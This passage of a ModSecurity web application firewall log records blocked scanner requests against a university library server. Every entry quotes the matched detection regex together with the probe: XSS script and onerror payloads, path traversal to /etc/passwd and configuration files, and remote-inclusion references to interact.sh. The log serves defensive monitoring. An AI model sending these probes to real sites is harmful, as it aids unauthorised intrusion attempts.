"/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnCKxQAAAAK"]
[Tue Aug 29 11:51:09.579880 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAhhczsAAAAd"]
[Tue Aug 29 11:51:10.935320 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAjtdFcAAAAX"]
[Tue Aug 29 11:51:11.541675 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnEqTEAAAAO"]
[Tue Aug 29 11:51:12.809438 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm-McEAAAAI"]
[Tue Aug 29 11:51:13.553048 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnEqTcAAAAO"]
[Tue Aug 29 11:51:13.580006 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAmHd9YAAAAz"]
[Tue Aug 29 11:51:13.659648 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAnEqToAAAAO"]
[Tue Aug 29 11:51:14.740996 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAm7m88AAAAE"]
[Tue Aug 29 11:51:15.727383 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkr0EUAAAAC"]
[Tue Aug 29 11:51:15.841177 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkr0EYAAAAC"]
[Tue Aug 29 11:51:15.864851 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAhhc0wAAAAd"]
[Tue Aug 29 11:51:16.552366 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAfWOD4AAAAL"]
[Tue Aug 29 11:51:16.564591 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAm5BxQAAAAA"]
[Tue Aug 29 11:51:17.979604 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAm@5xAAAAAH"]
[Tue Aug 29 11:51:18.002708 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAkyyEgAAAAW"]
[Tue Aug 29 11:51:20.532447 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAknEOMAAAAB"]
[Tue Aug 29 11:51:20.724218 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAlIBhkAAAAn"]
[Tue Aug 29 11:51:21.536641 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAknEOYAAAAB"]
[Tue Aug 29 11:51:21.647593 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAnB5U4AAAAJ"]
[Tue Aug 29 11:51:21.703906 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAlIBhwAAAAn"]
[Tue Aug 29 11:51:22.788292 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAkr0FQAAAAC"]
[Tue Aug 29 11:51:22.904467 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAmQ-w4AAAAb"]
[Tue Aug 29 11:51:22.915821 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAmIbP4AAAAo"]
[Tue Aug 29 11:51:23.688321 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAjdQUQAAAAZ"]
[Tue Aug 29 11:51:23.763905 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAm@5x0AAAAH"]
[Tue Aug 29 11:51:24.800525 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAkyyE4AAAAW"]
[Tue Aug 29 11:51:24.967044 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAfWOEoAAAAL"]
[Tue Aug 29 11:51:26.729268 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAmQ-xgAAAAb"]
[Tue Aug 29 11:51:26.785299 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAmIbQYAAAAo"]
